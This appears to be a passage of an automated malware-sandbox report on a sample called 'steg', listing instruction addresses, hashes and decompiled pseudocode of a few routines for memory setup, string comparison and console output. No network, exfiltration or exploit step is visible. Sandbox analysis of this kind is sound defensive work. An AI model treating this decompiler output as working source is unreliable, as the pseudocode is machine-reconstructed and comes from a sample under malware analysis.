                                                                                                                    0x00f8d24f
                                                                                                                    0x00f8d25f
                                                                                                                    0x00f8d26a
                                                                                                                    0x00f8d26a
                                                                                                                    0x00f8d26c
                                                                                                                    0x00f8d276
                                                                                                                    0x00f8d277
                                                                                                                    0x00f8d279
                                                                                                                    0x00f8d27e
                                                                                                                    0x00f8d286
                                                                                                                    0x00f8d288
                                                                                                                    0x00f8d28d
                                                                                                                    0x00f8d295
                                                                                                                    0x00f8d297
                                                                                                                    0x00f8d299
                                                                                                                    0x00f8d2a3
                                                                                                                    0x00f8d2ad
                                                                                                                    0x00f8d2af
                                                                                                                    0x00f8d2bc
                                                                                                                    0x00f8d6b1
                                                                                                                    0x00f8d6b4
                                                                                                                    0x00f8d6b5
                                                                                                                    0x00f8d6b7
                                                                                                                    0x00f8d6c0
                                                                                                                    0x00f8d2c2
                                                                                                                    0x00f8d2d2
                                                                                                                    0x00f8d2de
                                                                                                                    0x00f8d2e3
                                                                                                                    0x00f8d2e8
                                                                                                                    0x00f8d313
                                                                                                                    0x00f8d318
                                                                                                                    0x00f8d31e
                                                                                                                    0x00f8d321
                                                                                                                    0x00f8d327
                                                                                                                    0x00f8d327
                                                                                                                    0x00f8d329
                                                                                                                    0x00f8d32a
                                                                                                                    0x00f8d32a
                                                                                                                    0x00f8d32e
                                                                                                                    0x00f8d330
                                                                                                                    0x00f8d338
                                                                                                                    0x00f8d368
                                                                                                                    0x00f8d380
                                                                                                                    0x00f8d385
                                                                                                                    0x00f8d33a
                                                                                                                    0x00f8d34d
                                                                                                                    0x00f8d352
                                                                                                                    0x00f8d352
                                                                                                                    0x00f8d38f
                                                                                                                    0x00f8d394
                                                                                                                    0x00f8d397
                                                                                                                    0x00f8d399
                                                                                                                    0x00f8d3b2
                                                                                                                    0x00f8d3ca
                                                                                                                    0x00f8d3cf
                                                                                                                    0x00f8d3d5
                                                                                                                    0x00f8d3d8
                                                                                                                    0x00f8d3db
                                                                                                                    0x00f8d3db
                                                                                                                    0x00f8d3dd
                                                                                                                    0x00f8d3de
                                                                                                                    0x00f8d3de
                                                                                                                    0x00f8d3e2
                                                                                                                    0x00f8d3e4
                                                                                                                    0x00f8d3ec
                                                                                                                    0x00f8d41c
                                                                                                                    0x00f8d434
                                                                                                                    0x00f8d439
                                                                                                                    0x00f8d3ee
                                                                                                                    0x00f8d401
                                                                                                                    0x00f8d406
                                                                                                                    0x00f8d406
                                                                                                                    0x00f8d3ec
                                                                                                                    0x00f8d448
                                                                                                                    0x00f8d461
                                                                                                                    0x00f8d466
                                                                                                                    0x00f8d479
                                                                                                                    0x00f8d47f
                                                                                                                    0x00f8d481
                                                                                                                    0x00f8d491
                                                                                                                    0x00f8d483
                                                                                                                    0x00f8d483
                                                                                                                    0x00f8d489
                                                                                                                    0x00f8d489
                                                                                                                    0x00f8d497
                                                                                                                    0x00f8d499
                                                                                                                    0x00f8d4a3
                                                                                                                    0x00f8d4a8
                                                                                                                    0x00f8d4ab
                                                                                                                    0x00f8d4ad
                                                                                                                    0x00f8d4b3
                                                                                                                    0x00f8d4b9
                                                                                                                    0x00f8d4bc
                                                                                                                    0x00f8d4bc
                                                                                                                    0x00f8d4be
                                                                                                                    0x00f8d4bf
                                                                                                                    0x00f8d4bf
                                                                                                                    0x00f8d4dc
                                                                                                                    0x00f8d4e1
                                                                                                                    0x00f8d4e4
                                                                                                                    0x00f8d4e6
                                                                                                                    0x00f8d4ec
                                                                                                                    0x00f8d4f2
                                                                                                                    0x00f8d4f4
                                                                                                                    0x00f8d4fb
                                                                                                                    0x00f8d500
                                                                                                                    0x00f8d503
                                                                                                                    0x00f8d506
                                                                                                                    0x00f8d50c
                                                                                                                    0x00f8d50c
                                                                                                                    0x00f8d50f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8d52f
                                                                                                                    0x00f8d549
                                                                                                                    0x00f8d558
                                                                                                                    0x00f8d55a
                                                                                                                    0x00f8d55f
                                                                                                                    0x00f8d56d
                                                                                                                    0x00f8d572
                                                                                                                    0x00f8d578
                                                                                                                    0x00f8d57b
                                                                                                                    0x00f8d57e
                                                                                                                    0x00f8d57e
                                                                                                                    0x00f8d580
                                                                                                                    0x00f8d581
                                                                                                                    0x00f8d581
                                                                                                                    0x00f8d587
                                                                                                                    0x00f8d58a
                                                                                                                    0x00f8d590
                                                                                                                    0x00f8d592
                                                                                                                    0x00f8d592
                                                                                                                    0x00f8d597
                                                                                                                    0x00f8d597
                                                                                                                    0x00f8d599
                                                                                                                    0x00f8d59a
                                                                                                                    0x00f8d59a
                                                                                                                    0x00f8d5a0
                                                                                                                    0x00f8d5a3
                                                                                                                    0x00f8d5a9
                                                                                                                    0x00f8d5af
                                                                                                                    0x00f8d5b7
                                                                                                                    0x00f8d5b7
                                                                                                                    0x00f8d5b9
                                                                                                                    0x00f8d5ba
                                                                                                                    0x00f8d5ba
                                                                                                                    0x00f8d5c0
                                                                                                                    0x00f8d5c3
                                                                                                                    0x00f8d5da
                                                                                                                    0x00f8d5df
                                                                                                                    0x00f8d5e4
                                                                                                                    0x00f8d5e7
                                                                                                                    0x00f8d5e9
                                                                                                                    0x00f8d616
                                                                                                                    0x00f8d617
                                                                                                                    0x00f8d61c
                                                                                                                    0x00f8d61d
                                                                                                                    0x00f8d628
                                                                                                                    0x00f8d629
                                                                                                                    0x00f8d62e
                                                                                                                    0x00f8d634
                                                                                                                    0x00f8d645
                                                                                                                    0x00f8d65c
                                                                                                                    0x00f8d661
                                                                                                                    0x00f8d667
                                                                                                                    0x00f8d66c
                                                                                                                    0x00f8d671
                                                                                                                    0x00f8d5eb
                                                                                                                    0x00f8d5f1
                                                                                                                    0x00f8d5f8
                                                                                                                    0x00f8d5f9
                                                                                                                    0x00f8d600
                                                                                                                    0x00f8d601
                                                                                                                    0x00f8d606
                                                                                                                    0x00f8d60b
                                                                                                                    0x00f8d60b
                                                                                                                    0x00f8d5e9
                                                                                                                    0x00f8d5c3
                                                                                                                    0x00f8d5a3
                                                                                                                    0x00f8d67a
                                                                                                                    0x00f8d67f
                                                                                                                    0x00f8d682
                                                                                                                    0x00f8d685
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8d685
                                                                                                                    0x00f8d50c
                                                                                                                    0x00f8d68b
                                                                                                                    0x00f8d691
                                                                                                                    0x00f8d69c
                                                                                                                    0x00f8d6ab
                                                                                                                    0x00f8d6ab
                                                                                                                    0x00f8d4f4
                                                                                                                    0x00f8d4e6
                                                                                                                    0x00000000
                                                                                                                    0x00f8d2ea
                                                                                                                    0x00f8d2ea
                                                                                                                    0x00f8d2f0
                                                                                                                    0x00f8d2f1
                                                                                                                    0x00f8d2ff
                                                                                                                    0x00f8d2ff
                                                                                                                    0x00f8d2e8

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 2102423945-2967466578
                                                                                                                    • Opcode ID: 89c77ba188483e2b994595e2b464948e8f740521c482530cf10d2cf753cb2a14
                                                                                                                    • Instruction ID: f022f1b1ab2f24cdc2e1a5725088f399d0179c9a774660d30d23f763ebac3049
                                                                                                                    • Opcode Fuzzy Hash: 89c77ba188483e2b994595e2b464948e8f740521c482530cf10d2cf753cb2a14
                                                                                                                    • Instruction Fuzzy Hash: DBC1A271D01359AADF24EBA0CC46FEE737CAF15700F1441EAF609A6092EA75AB84DF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FCAA87 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 328COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 99%
                                                                                                                    			E00FCAA87(signed int _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, signed int _a20, signed int _a24) {
				signed short _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t116;
				intOrPtr* _t118;
				signed int _t132;
				signed int _t135;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				intOrPtr _t153;
				signed short _t161;
				signed int _t174;
				signed int _t175;
				char* _t182;
				signed int _t183;
				signed int _t184;
				unsigned int _t186;
				intOrPtr _t191;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				char* _t196;
				short _t197;
				signed int _t199;
				intOrPtr _t200;
				intOrPtr* _t201;
				char _t204;
				void* _t205;
				intOrPtr _t206;
				signed int _t207;
				intOrPtr* _t208;
				signed int _t209;
				intOrPtr _t210;
				intOrPtr* _t211;
				signed int _t212;
				char* _t213;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t221;

				_t186 = _a20;
				_v24 = 0;
				_v12 = 0;
				_t207 = _a4;
				_v28 =  !_t186 & 0x00000001;
				_t116 =  *((intOrPtr*)(_t207 + 4));
				_t209 = 0;
				_t182 = 0;
				_v20 = 0;
				_a20 = _t186 >> 0x00000001 & 0x00000001;
				_v8 = 0x400;
				if(_t116 <= 0x28) {
					_v16 = 0x28;
				} else {
					_v16 = _t116 + 0x00000007 & 0xfffffff8;
				}
				 *_a8 = _t182;
				_t118 = _a12;
				if(_t118 == 0 ||  *_t118 == _t182) {
					L23:
					_v32 = ( *((intOrPtr*)(_t207 + 4)) + 0x00000007 & 0xfffffff8) + (_v16 + _t209) * 2 + 0xea;
					_t208 = E00FC91B7(( *((intOrPtr*)(_t207 + 4)) + 0x00000007 & 0xfffffff8) + (_v16 + _t209) * 2 + 0xea);
					_t218 = _t217 + 4;
					if(_t208 == 0) {
						E00F97247(_t182);
						goto L52;
					} else {
						E00FE7C87(_t208, 0, _v32);
						_t34 = _t208 + 0xb0; // 0xb0
						_t191 = _t34;
						 *((intOrPtr*)(_t208 + 0xa8)) = _t191;
						_t192 = _t191 + 0x30;
						 *((intOrPtr*)(_t208 + 0x38)) = _t192;
						_t193 = _t192 + ( *((intOrPtr*)(_a4 + 4)) + 0x00000007 & 0xfffffff8);
						 *((intOrPtr*)(_t208 + 0x40)) = _t193;
						_t194 = _t193 + _v16;
						_t220 = _t218 + 0xc;
						 *((intOrPtr*)(_t208 + 0x3c)) = _t194;
						_t195 = _t194 + _v16;
						 *((intOrPtr*)(_t208 + 0x84)) = _t195;
						if(_t182 != 0) {
							_t43 = _t195 + 1; // 0x29
							 *((intOrPtr*)(_t208 + 0x88)) = _t43 + _t209;
							E00FE7337(_t195, _t182, _t209);
							E00FE7337( *((intOrPtr*)(_t208 + 0x88)), _t182, _t209);
							_t200 =  *((intOrPtr*)(_t208 + 0x88));
							 *((intOrPtr*)(_t209 + _t200)) =  *0x476244;
							 *((intOrPtr*)(_t209 + _t200 + 4)) =  *0x476248;
							E00F97247(_t182);
							_t220 = _t220 + 0x1c;
						}
						_t196 = _a12;
						_t132 = _a4;
						_t183 = _a24;
						 *_t208 = _t132;
						 *(_t208 + 0x78) = _t183;
						if(_t196 == 0 ||  *_t196 == 0 || _v12 != 0) {
							_v24 = 1;
							 *((char*)(_t208 + 0xe)) = 4;
							_t184 = _t183 & 0x00000001;
							goto L36;
						} else {
							_a4 = 0;
							_t199 =  *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x18))))(_t132,  *((intOrPtr*)(_t208 + 0x84)),  *((intOrPtr*)(_t208 + 0x38)), _t183,  &_a4);
							_t221 = _t220 + 0x14;
							_t184 = _a4 & 0x00000001;
							_a12 = _t199;
							if(_t199 != 0) {
								L37:
								_t211 =  *((intOrPtr*)(_t208 + 0x38));
								_t153 =  *_t211;
								if(_t153 != 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t153 + 4))))(_t211);
									_t221 = _t221 + 4;
									 *_t211 = 0;
								}
								E00F97247(_t208);
								return _a12;
							} else {
								if(_t184 == 0) {
									E00FB5FA7(_t208);
									_t161 =  *(_t208 + 0x70);
									_t220 = _t221 + 4;
									if(_t161 > 0x400) {
										if(_t161 <= 0x2000) {
											_v8 = _t161 & 0x0000ffff;
										} else {
											_v8 = 0x2000;
										}
									}
								}
								L36:
								_t135 = E00FCB197(_t208,  &_v8, 0xffffffff);
								_t221 = _t220 + 0xc;
								_a12 = _t135;
								if(_t135 == 0) {
									_t210 =  *((intOrPtr*)(_t208 + 0xa8));
									_a4 = _a16 + 0x00000007 & 0xfffffff8;
									E00FE7C87(_t210, 0, 0x30);
									_t204 = _v12;
									_t197 = _a4;
									 *(_t210 + 0x14) = _v8 & 0x0000ffff;
									_a4 = 0x424650;
									 *((intOrPtr*)(_t210 + 0x18)) = _t197;
									 *((intOrPtr*)(_t210 + 0x24)) = _t208;
									 *((intOrPtr*)(_t210 + 0x10)) = 0x64;
									 *(_t210 + 0x1c) = 0 | _t204 == 0x00000000;
									_t144 =  ==  ? _a4 : 0;
									 *((intOrPtr*)(_t210 + 0x20)) =  ==  ? _a4 : 0;
									 *((char*)(_t208 + 6)) = _v28;
									if(_a20 == 0 || _t184 == 0) {
										_t146 = 0;
									} else {
										_t146 = 1;
									}
									 *(_t208 + 7) = _t146;
									_t147 = _v24;
									 *((char*)(_t208 + 0x15)) = _t204;
									 *((intOrPtr*)(_t208 + 0x80)) = 0x3fffffff;
									 *(_t208 + 0xb) = _t147;
									 *(_t208 + 4) = _t147;
									 *(_t208 + 0x12) = _t147;
									 *((char*)(_t208 + 0xd)) = _t204;
									 *(_t208 + 0xc) = _t184;
									if(_t147 != 0 || _v28 == 0) {
										_t148 = 1;
									} else {
										_t148 = 0;
									}
									 *(_t208 + 8) = _t148;
									 *((char*)(_t208 + 9)) = _t148 & 0xffffff00 | _t148 == 0x00000000;
									 *((char*)(_t208 + 0xa)) = 2;
									 *((short*)(_t208 + 0x74)) = _t197;
									 *((intOrPtr*)(_t208 + 0xa0)) = 0xffffffff;
									 *((intOrPtr*)(_t208 + 0xa4)) = 0xffffffff;
									E00FB5FA7(_t208);
									if(_v12 != 0) {
										 *((char*)(_t208 + 5)) = 4;
									}
									 *_a8 = _t208;
									return 0;
								} else {
									goto L37;
								}
							}
						}
					}
				} else {
					_v32 =  *((intOrPtr*)(_t207 + 8)) + 1;
					_t182 = E00FC91B7( *((intOrPtr*)(_t207 + 8)) + 1 +  *((intOrPtr*)(_t207 + 8)) + 1);
					_t217 = _t217 + 4;
					if(_t182 == 0) {
						L52:
						return 7;
					} else {
						_t212 = _a12;
						_t201 = 0x476238;
						_t174 = _t212;
						while(1) {
							_t205 =  *_t174;
							if(_t205 !=  *_t201) {
								break;
							}
							if(_t205 == 0) {
								L11:
								_t175 = 0;
							} else {
								_t206 =  *((intOrPtr*)(_t174 + 1));
								if(_t206 !=  *((intOrPtr*)(_t201 + 1))) {
									break;
								} else {
									_t174 = _t174 + 2;
									_t201 = _t201 + 2;
									if(_t206 != 0) {
										continue;
									} else {
										goto L11;
									}
								}
							}
							L13:
							 *_t182 = 0;
							if(_t175 != 0) {
								_t175 =  *((intOrPtr*)( *((intOrPtr*)(_t207 + 0x24))))(_t207, _t212, _v32, _t182);
								_t217 = _t217 + 0x10;
								_v20 = _t175;
							} else {
								_v12 = 1;
							}
							_t213 = _t182;
							if( *_t182 != 0) {
								do {
									_t213 = _t213 + 1;
								} while ( *_t213 != 0);
							}
							_t209 = _t213 - _t182 & 0x3fffffff;
							if(_t175 != 0) {
								E00F97247(_t182);
								return _v20;
							} else {
								_t24 = _t209 + 8; // 0x9
								if(_t24 <=  *((intOrPtr*)(_t207 + 8))) {
									goto L23;
								} else {
									E00F97247(_t182);
									return 0xe;
								}
							}
							goto L53;
						}
						asm("sbb eax, eax");
						_t175 = _t174 | 0x00000001;
						goto L13;
					}
				}
				L53:
			}

















































                                                                                                                    0x00fcaa8d
                                                                                                                    0x00fcaa92
                                                                                                                    0x00fcaa95
                                                                                                                    0x00fcaaa2
                                                                                                                    0x00fcaaa7
                                                                                                                    0x00fcaaaa
                                                                                                                    0x00fcaaad
                                                                                                                    0x00fcaab2
                                                                                                                    0x00fcaab4
                                                                                                                    0x00fcaab7
                                                                                                                    0x00fcaaba
                                                                                                                    0x00fcaac4
                                                                                                                    0x00fcaad1
                                                                                                                    0x00fcaac6
                                                                                                                    0x00fcaacc
                                                                                                                    0x00fcaacc
                                                                                                                    0x00fcaadb
                                                                                                                    0x00fcaadd
                                                                                                                    0x00fcaae2
                                                                                                                    0x00fcabad
                                                                                                                    0x00fcabc4
                                                                                                                    0x00fcabcc
                                                                                                                    0x00fcabce
                                                                                                                    0x00fcabd3
                                                                                                                    0x00fcae11
                                                                                                                    0x00000000
                                                                                                                    0x00fcabd9
                                                                                                                    0x00fcabdf
                                                                                                                    0x00fcabe7
                                                                                                                    0x00fcabe7
                                                                                                                    0x00fcabed
                                                                                                                    0x00fcabf3
                                                                                                                    0x00fcabf6
                                                                                                                    0x00fcac02
                                                                                                                    0x00fcac04
                                                                                                                    0x00fcac07
                                                                                                                    0x00fcac0a
                                                                                                                    0x00fcac0d
                                                                                                                    0x00fcac10
                                                                                                                    0x00fcac13
                                                                                                                    0x00fcac1b
                                                                                                                    0x00fcac1e
                                                                                                                    0x00fcac25
                                                                                                                    0x00fcac2b
                                                                                                                    0x00fcac38
                                                                                                                    0x00fcac3d
                                                                                                                    0x00fcac48
                                                                                                                    0x00fcac51
                                                                                                                    0x00fcac55
                                                                                                                    0x00fcac5a
                                                                                                                    0x00fcac5a
                                                                                                                    0x00fcac5d
                                                                                                                    0x00fcac60
                                                                                                                    0x00fcac63
                                                                                                                    0x00fcac66
                                                                                                                    0x00fcac68
                                                                                                                    0x00fcac6d
                                                                                                                    0x00fcacdb
                                                                                                                    0x00fcacde
                                                                                                                    0x00fcace2
                                                                                                                    0x00000000
                                                                                                                    0x00fcac7a
                                                                                                                    0x00fcac82
                                                                                                                    0x00fcac98
                                                                                                                    0x00fcac9a
                                                                                                                    0x00fcac9d
                                                                                                                    0x00fcaca0
                                                                                                                    0x00fcaca5
                                                                                                                    0x00fcacfa
                                                                                                                    0x00fcacfa
                                                                                                                    0x00fcacfd
                                                                                                                    0x00fcad01
                                                                                                                    0x00fcad07
                                                                                                                    0x00fcad09
                                                                                                                    0x00fcad0c
                                                                                                                    0x00fcad0c
                                                                                                                    0x00fcad13
                                                                                                                    0x00fcad24
                                                                                                                    0x00fcaca7
                                                                                                                    0x00fcaca9
                                                                                                                    0x00fcacac
                                                                                                                    0x00fcacb1
                                                                                                                    0x00fcacb4
                                                                                                                    0x00fcacbc
                                                                                                                    0x00fcacc3
                                                                                                                    0x00fcacd1
                                                                                                                    0x00fcacc5
                                                                                                                    0x00fcacc5
                                                                                                                    0x00fcacc5
                                                                                                                    0x00fcacc3
                                                                                                                    0x00fcacbc
                                                                                                                    0x00fcace4
                                                                                                                    0x00fcaceb
                                                                                                                    0x00fcacf0
                                                                                                                    0x00fcacf3
                                                                                                                    0x00fcacf8
                                                                                                                    0x00fcad28
                                                                                                                    0x00fcad39
                                                                                                                    0x00fcad3c
                                                                                                                    0x00fcad45
                                                                                                                    0x00fcad48
                                                                                                                    0x00fcad4b
                                                                                                                    0x00fcad58
                                                                                                                    0x00fcad5f
                                                                                                                    0x00fcad62
                                                                                                                    0x00fcad65
                                                                                                                    0x00fcad6c
                                                                                                                    0x00fcad73
                                                                                                                    0x00fcad7b
                                                                                                                    0x00fcad81
                                                                                                                    0x00fcad84
                                                                                                                    0x00fcad91
                                                                                                                    0x00fcad8a
                                                                                                                    0x00fcad8a
                                                                                                                    0x00fcad8a
                                                                                                                    0x00fcad93
                                                                                                                    0x00fcad96
                                                                                                                    0x00fcad99
                                                                                                                    0x00fcad9c
                                                                                                                    0x00fcada6
                                                                                                                    0x00fcada9
                                                                                                                    0x00fcadac
                                                                                                                    0x00fcadaf
                                                                                                                    0x00fcadb2
                                                                                                                    0x00fcadb7
                                                                                                                    0x00fcadc3
                                                                                                                    0x00fcadbf
                                                                                                                    0x00fcadbf
                                                                                                                    0x00fcadbf
                                                                                                                    0x00fcadca
                                                                                                                    0x00fcadd1
                                                                                                                    0x00fcadd4
                                                                                                                    0x00fcadd8
                                                                                                                    0x00fcaddc
                                                                                                                    0x00fcade6
                                                                                                                    0x00fcadf0
                                                                                                                    0x00fcadfc
                                                                                                                    0x00fcadfe
                                                                                                                    0x00fcadfe
                                                                                                                    0x00fcae05
                                                                                                                    0x00fcae0f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcacf8
                                                                                                                    0x00fcaca5
                                                                                                                    0x00fcac6d
                                                                                                                    0x00fcaaf0
                                                                                                                    0x00fcaaf4
                                                                                                                    0x00fcaaff
                                                                                                                    0x00fcab01
                                                                                                                    0x00fcab06
                                                                                                                    0x00fcae1b
                                                                                                                    0x00fcae24
                                                                                                                    0x00fcab0c
                                                                                                                    0x00fcab0c
                                                                                                                    0x00fcab0f
                                                                                                                    0x00fcab14
                                                                                                                    0x00fcab17
                                                                                                                    0x00fcab17
                                                                                                                    0x00fcab1b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcab1f
                                                                                                                    0x00fcab33
                                                                                                                    0x00fcab33
                                                                                                                    0x00fcab21
                                                                                                                    0x00fcab21
                                                                                                                    0x00fcab27
                                                                                                                    0x00000000
                                                                                                                    0x00fcab29
                                                                                                                    0x00fcab29
                                                                                                                    0x00fcab2c
                                                                                                                    0x00fcab31
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcab31
                                                                                                                    0x00fcab27
                                                                                                                    0x00fcab3c
                                                                                                                    0x00fcab3c
                                                                                                                    0x00fcab41
                                                                                                                    0x00fcab55
                                                                                                                    0x00fcab57
                                                                                                                    0x00fcab5a
                                                                                                                    0x00fcab43
                                                                                                                    0x00fcab43
                                                                                                                    0x00fcab43
                                                                                                                    0x00fcab60
                                                                                                                    0x00fcab62
                                                                                                                    0x00fcab67
                                                                                                                    0x00fcab67
                                                                                                                    0x00fcab68
                                                                                                                    0x00fcab67
                                                                                                                    0x00fcab6f
                                                                                                                    0x00fcab77
                                                                                                                    0x00fcab9c
                                                                                                                    0x00fcabac
                                                                                                                    0x00fcab79
                                                                                                                    0x00fcab79
                                                                                                                    0x00fcab7f
                                                                                                                    0x00000000
                                                                                                                    0x00fcab81
                                                                                                                    0x00fcab87
                                                                                                                    0x00fcab97
                                                                                                                    0x00fcab97
                                                                                                                    0x00fcab7f
                                                                                                                    0x00000000
                                                                                                                    0x00fcab77
                                                                                                                    0x00fcab37
                                                                                                                    0x00fcab39
                                                                                                                    0x00000000
                                                                                                                    0x00fcab39
                                                                                                                    0x00fcab06
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8bG$PFB
                                                                                                                    • API String ID: 0-3557998757
                                                                                                                    • Opcode ID: 0b749eba8c1860d0a13bccc6fc644d1c1d32429c8aa3b7bfa15f5c639c85171f
                                                                                                                    • Instruction ID: 4319f9a8b9f67bf6d52507926dc8ca021444dbd727b8220dbe50a0ba94b5c6cd
                                                                                                                    • Opcode Fuzzy Hash: 0b749eba8c1860d0a13bccc6fc644d1c1d32429c8aa3b7bfa15f5c639c85171f
                                                                                                                    • Instruction Fuzzy Hash: 07C106B1E0064AAFDB10CF68C982BAABBE0FF55324F04416DE869C7341D335E954DB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8BF57 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ___from_strstr_to_strchrswprintf$_strstr
                                                                                                                    • String ID: J
                                                                                                                    • API String ID: 2779265039-1141589763
                                                                                                                    • Opcode ID: 1bde665119345f048591d14e3dffabe9f1a5492d805b2cbac27908dc58dc2e5c
                                                                                                                    • Instruction ID: b1c602f4f77cd4c336085727c7bf4807d05d0031c2a0b5b73362839331e98fc6
                                                                                                                    • Opcode Fuzzy Hash: 1bde665119345f048591d14e3dffabe9f1a5492d805b2cbac27908dc58dc2e5c
                                                                                                                    • Instruction Fuzzy Hash: 71519471A006989FDB20EB94CC45FEA73B8BB04700F0400E5F649E7152EBB5AE84DFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8D867 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: swprintf$_memset
                                                                                                                    • String ID: D
                                                                                                                    • API String ID: 1292703666-2746444292
                                                                                                                    • Opcode ID: 5f3aa764ff59d5899a7b3aa04a70e0d1a5d7d246ccbea1a6b2de96ceda57c230
                                                                                                                    • Instruction ID: ec307f7f408e34172cce2c93f6aaefde2cc4d21520088d5884b1bb62155c32ea
                                                                                                                    • Opcode Fuzzy Hash: 5f3aa764ff59d5899a7b3aa04a70e0d1a5d7d246ccbea1a6b2de96ceda57c230
                                                                                                                    • Instruction Fuzzy Hash: 0D516DB1A01258AAEB11EBA0DC45FDEB7BCAF08700F4001E5F64CE6191EB74AB849F54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8C857 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 20%
                                                                                                                    			E00F8C857(intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				void* _t3;
				void* _t8;
				void* _t14;
				void* _t19;
				intOrPtr _t20;
				void* _t21;
				intOrPtr _t22;
				void* _t23;

				_t22 = _a4;
				if(_t22 == 0) {
					E00F8F2D7();
					_t3 =  *0x470104(0xfffffff5);
					 *0x470050(_t3, 0xa);
					_push(0x470d1c);
					_push(0x470d28);
					_push(0x470d34);
					_push(0x470d40);
					_push(0x470d48);
					E00FE9C53(_t19, _t21, _t22, __eflags);
					_push(0x470d68);
					E00FE9C53(_t19, _t21, _t22, __eflags);
					goto L6;
				} else {
					_t14 = E00FE928A(0x4833ac, _t22, 0x470ba0);
					_t20 =  *0x4833ac;
					_t23 = _t23 + 0xc;
					if(_t20 == 0) {
						L4:
						return E00F8EE77(0x470ba8, _t22);
					} else {
						_t30 = _t14;
						if(_t14 != 0) {
							goto L4;
						} else {
							_push(_t20);
							_push(0x470c20);
							E00FE93FA(_t19, _t21, _t22, _t30);
							_push( *0x4833ac);
							_push(0x470c78);
							E00FE93FA(_t19, _t21, _t22, _t30);
							_push( *0x4833ac);
							_push(0x470cc8);
							E00FE93FA(_t19, _t21, _t22, _t30);
							L6:
							E00F8EAC7();
							_t31 = _t22;
							if(_t22 == 0) {
								_t8 =  *0x470104(0xfffffff5);
								 *0x470050(_t8, 0xf);
								_push(0x4703dc);
								_push(0x470e64);
								return E00FE9C53(_t19, _t21, _t22, __eflags);
							} else {
								_push(0x470de0);
								_push( *0x4833ac);
								E00FE92CF(_t19, _t21, _t22, _t31);
								_push(0x4703dc);
								_push(0x470e2c);
								_push( *0x4833ac);
								E00FE92CF(_t19, _t21, _t22, _t31);
								_push( *0x4833ac);
								return E00FE9010(_t19, _t21, _t22, _t31);
							}
						}
					}
				}
			}













                                                                                                                    0x00f8c85b
                                                                                                                    0x00f8c860
                                                                                                                    0x00f8c8c1
                                                                                                                    0x00f8c8c8
                                                                                                                    0x00f8c8d1
                                                                                                                    0x00f8c8d7
                                                                                                                    0x00f8c8dc
                                                                                                                    0x00f8c8e1
                                                                                                                    0x00f8c8e6
                                                                                                                    0x00f8c8eb
                                                                                                                    0x00f8c8f0
                                                                                                                    0x00f8c8f5
                                                                                                                    0x00f8c8fa
                                                                                                                    0x00000000
                                                                                                                    0x00f8c862
                                                                                                                    0x00f8c86d
